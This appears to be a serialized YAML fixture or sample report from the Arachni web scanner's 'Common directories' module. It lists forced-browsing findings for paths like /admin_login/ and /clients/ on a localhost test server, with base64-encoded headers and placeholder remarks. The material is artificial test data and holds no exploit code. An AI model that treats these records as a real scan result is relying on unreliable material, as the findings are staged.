mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/query/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/query/ injected: query id: query elem: path remarks: {} method: '' response: query headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/example/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/example/ injected: example id: example elem: path remarks: {} method: '' response: example headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/send/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/send/ injected: send id: send elem: path remarks: {} method: '' response: send headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/details/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/details/ injected: details id: details elem: path remarks: :stuff: - Blah - Blah2 method: '' response: details headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/examples/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/examples/ injected: examples id: examples elem: path remarks: :stuff: - Blah - Blah2 method: '' response: examples headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/settings/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/settings/ injected: settings id: settings elem: path remarks: {} method: '' response: settings headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/feedback/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/feedback/ injected: feedback id: feedback elem: path remarks: {} method: '' response: feedback headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/global/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/global/ injected: global id: global elem: path remarks: {} method: '' response: global headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/globals/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/globals/ injected: globals id: globals elem: path remarks: {} method: '' response: globals headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/guestbook/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/guestbook/ injected: guestbook id: guestbook elem: path remarks: {} method: '' response: guestbook headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/admin_/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/admin_/ injected: admin_ id: admin_ elem: path remarks: {} method: '' response: admin_ headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/admin_login/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/admin_login/ injected: admin_login id: admin_login elem: path remarks: {} method: '' response: admin_login headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/admin_logon/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/admin_logon/ injected: admin_logon id: admin_logon elem: path remarks: {} method: '' response: admin_logon headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/adminlogon/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/adminlogon/ injected: adminlogon id: adminlogon elem: path remarks: {} method: '' response: adminlogon headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/client/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/client/ injected: client id: client elem: path remarks: {} method: '' response: client headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/clients/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/clients/ injected: clients id: clients elem: path remarks: {} method: '' response: clients headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
